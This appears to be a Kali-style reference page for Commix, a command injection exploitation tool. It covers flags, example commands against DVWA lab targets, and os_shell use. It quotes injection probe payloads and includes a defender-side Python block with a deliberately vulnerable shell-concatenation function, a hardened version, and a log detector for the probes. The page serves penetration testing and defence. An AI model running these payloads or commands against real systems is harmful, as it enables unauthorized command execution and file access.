Category: Web Application Analysis
Tags: command injection, os command injection, exploitation, web vulnerability, penetration testing

Commix

Automated all-in-one OS command injection and exploitation tool for detecting and exploiting command injection vulnerabilities in web applications.

Description

Commix (short for [comm]and [i]njection e[x]ploiter) is designed for web developers, penetration testers, and security researchers to test web applications for command injection vulnerabilities. It automates the detection and exploitation of command injection bugs, errors, or flaws in vulnerable parameters or strings. Written in Python, it provides a simple environment to identify and exploit these security issues efficiently.

The tool supports various injection techniques including classic, time-based, blind, and results-based methods. It can test parameters in URLs, POST data, HTTP headers like Referer and User-Agent, and cookies. Once a vulnerability is found, commix offers a pseudo-terminal shell for interactive command execution on the target system.

Use cases include security assessments of web applications to find OS command injection flaws, automated vulnerability scanning, and post-exploitation activities through gained shell access.

How It Works

Commix tests web parameters and HTTP headers for command injection vulnerabilities using multiple techniques: results-based classic injection, time-based blind injection, dynamic code evaluation, and tempfile-based semi-blind injection. It sends payloads like ';echo KSXTLU$((18+64))$(echo KSXTLU)KSXTLU' or Windows-specific '%26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA' to detect injectable points. Upon success, it provides an os_shell for command execution, supporting enumeration (--current-user, --sys-info), file access (--file-read, --file-write), and shell options like reverse_tcp/bind_tcp.
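The probing technique described above, from the defender's side, as an added example that is neither the Kali page's nor the Commix project's own code. It shows the code pattern the tool finds (a request parameter concatenated into a shell command line) next to a hardened form that validates the input and never hands it to a shell, and a small log check that flags the arithmetic-marker probe shapes quoted above in access-log lines. The log lines, IP addresses and paths are constructed; the signature regexes are assumptions derived only from the two payload shapes quoted on this page.

```python
"""Defender-side view of Commix-style command-injection probing.

Part 1: the vulnerable pattern and its hardened counterpart.
Part 2: a detector for the probe shapes over constructed access-log lines.
"""
import ipaddress
import re
from urllib.parse import unquote_plus

# --- 1. the pattern the tool looks for, and the fix ---------------------

def vulnerable_ping(ip: str) -> str:
    """Vulnerable (demonstration only): the parameter is concatenated into a
    shell command line, so shell metacharacters in the value become part of
    the command. This is the string that would reach /bin/sh via shell=True."""
    return "ping -c 1 " + ip

def is_valid_ip(value: str) -> bool:
    """Strict allow-list check: only a literal IPv4/IPv6 address passes."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def hardened_ping_argv(ip: str) -> list[str]:
    """Hardened: validate first, then build an argv list for
    subprocess.run(argv) with no shell, so ';', '&', '$(...)' and '$(( ))'
    carry no meaning. Raises ValueError on anything that is not an address."""
    if not is_valid_ip(ip):
        raise ValueError(f"not an IP address: {ip!r}")
    return ["ping", "-c", "1", ip]

# --- 2. spotting the probes in access logs --------------------------------

# Assumed signatures, derived from the two payload shapes quoted on the page:
# a bash arithmetic expansion $((N+M)) wrapped in a marker, or the Windows
# 'set /a (N+M)' form. As the payload shape implies, the tool computes a
# number server-side and then looks for it wrapped in the marker in the
# response, so the arithmetic is the stable part worth matching on.
PROBE_PATTERNS = [
    re.compile(r"\$\(\(\d+\+\d+\)\)"),                # $((18+64))
    re.compile(r"set\s*/a\s*\(\d+\+\d+\)", re.I),      # set /a (49+1)
    re.compile(r"\$\(echo\s+[A-Z]{6}\)"),             # $(echo KSXTLU)
]

# Constructed access-log lines in combined-log style; not real traffic.
# Line 2 carries the Unix probe, line 3 the Windows probe, both URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Apr/2026:10:00:01 +0000] "GET /vuln/exec/?ip=127.0.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Apr/2026:10:00:02 +0000] "GET /vuln/exec/?ip=127.0.0.1%3Becho%20KSXTLU%24%28%2818%2B64%29%29%24%28echo%20KSXTLU%29KSXTLU HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Apr/2026:10:00:03 +0000] "GET /vuln/exec/?ip=127.0.0.1%26%20for%20/f%20%22delims%3D%22%20%25i%20in%20%28%27cmd%20/c%20%22set%20/a%20%2849%2B1%29%22%27%29%20do%20%40set%20/p%20%3D%20AWMZVA%25iAWMZVA HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.7 - - [16/Apr/2026:10:00:04 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/8.0"
"""

# client, ident, user, [timestamp], "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

def find_probes(log_text: str) -> list[dict]:
    """Return one record per request whose decoded target matches a probe
    signature. Decoding before matching matters: the markers arrive
    percent-encoded, so the raw line would not match."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, method, target = m.groups()
        decoded = unquote_plus(target)
        matched = [p.pattern for p in PROBE_PATTERNS if p.search(decoded)]
        if matched:
            hits.append({
                "src": src,
                "method": method,
                "path": decoded.split("?", 1)[0],
                "signatures": matched,
            })
    return hits

if __name__ == "__main__":
    print(hardened_ping_argv("127.0.0.1"))
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

Note that the detector only covers request lines; the same probes can arrive in the Cookie, Referer or User-Agent headers the page lists, which the combined log format records only partially (Referer and User-Agent) and a web application firewall or request-body logging would be needed to see in full.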

Installation

    sudo apt install commix

Flags

--url=URL            Target URL
--data=DATA          Data string to be sent through POST
--cookie=COOKIE      HTTP Cookie header
--level=LEVEL        Level of tests to perform (1-3, default: 1)
--current-user       Retrieve current user name
--hostname           Retrieve current hostname
--is-root            Check if the current user has root privileges
--sys-info           Retrieve system information
--file-read=FILE     Read a file from the target host
--file-write=FILE    Write to a file on the target host

Examples

Test POST parameter 'ip' for command injection vulnerability with cookie authentication
    commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' --data='ip=INJECT_HERE&Submit=Submit'

Exploit referer header vulnerability using highest testing level (level 3)
    commix --url="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php" --level=3

Basic URL exploitation with cookie; automatically detects Windows OS and provides os_shell
    commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low'

Execute 'whoami' command in the pseudo-terminal os_shell after successful injection
    commix(os_shell) > whoami

Execute 'id' command in os_shell to check current user privileges on Unix target
    commix(os_shell) > id

Execute 'ls' command in os_shell to list directory contents
    commix(os_shell) > ls

Show help and all available options
    commix -h
Updated 2026-04-16 (source: kali.org)